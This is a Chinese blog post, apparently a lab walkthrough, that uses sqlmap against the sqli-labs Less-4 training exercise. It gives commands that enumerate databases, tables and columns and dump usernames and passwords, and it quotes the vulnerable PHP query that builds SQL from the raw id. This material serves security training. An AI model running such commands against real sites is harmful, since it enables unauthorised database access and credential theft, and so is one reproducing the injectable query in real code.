网络安全-sqlmap实战之sqlilabs-Less4

目录

类型

-dbs枚举数据库

--tables枚举数据库表

 --columns枚举列

--dump枚举数据

查看源代码


类型

双引号注入

id后“

猜测sql语句

select * from users where id = ("参数") LIMIT 0,1

-dbs枚举数据库

使用-o参数优化

python sqlmap.py -u "192.168.172.128/sqli-labs_1/Less-4/?id=1" -dbs -o
枚举数据库

我们已知是mysql数据库,在过程中有询问已发现是mysql,是否探测其他的DBMS,需要输入y/n,为了加快速度,以后的文章中将会使用--batch来跳过。

--tables枚举数据库表

python sqlmap.py -u "192.168.172.128/sqli-labs_1/Less-4/?id=1" --dbms mysql -o -D security --tables
枚举数据库表

 --columns枚举列

因为-o参数中的threads是3,这里使用--threads时应该大于3小于10(最大值),想了解更多sqlmap参数可查看文章末尾文章中的sqlmap学习笔记。

python sqlmap.py -u "192.168.172.128/sqli-labs_1/Less-4/?id=1" --dbms mysql -o --threads=10 -D security -T users --columns
枚举列

--dump枚举数据

python sqlmap.py -u "192.168.172.128/sqli-labs_1/Less-4/?id=1" --dbms mysql -o --threads=10 -D security -T users -C username,password -dump
枚举数据

查看源代码

$id = '"' . $id . '"';
$sql="SELECT * FROM users WHERE id=($id) LIMIT 0,1";

更多内容查看:网络安全-自学笔记

有问题请下方评论,转载请注明出处,并附有原文链接,谢谢!如有侵权,请及时联系。

猜你喜欢

转载自blog.csdn.net/lady_killer9/article/details/106973232
今日推荐